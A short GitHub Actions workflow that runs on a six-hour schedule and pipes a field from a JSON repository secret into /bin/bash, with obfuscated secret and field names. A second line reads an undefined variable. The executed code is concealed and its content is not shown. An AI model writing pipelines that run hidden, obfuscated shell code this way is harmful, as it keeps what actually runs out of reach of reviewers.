name: chenlikai6715
on:
  workflow_dispatch:
  schedule:
    - cron: '57 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenlikai6715
        env:
          qzcm5034: ${{ secrets.qzcm5034 }}
        run: |
          echo $qzcm5034 | jq -r .wf625 | /bin/bash
          echo $jmwua031 | jq -r .egq9418 | /bin/bash

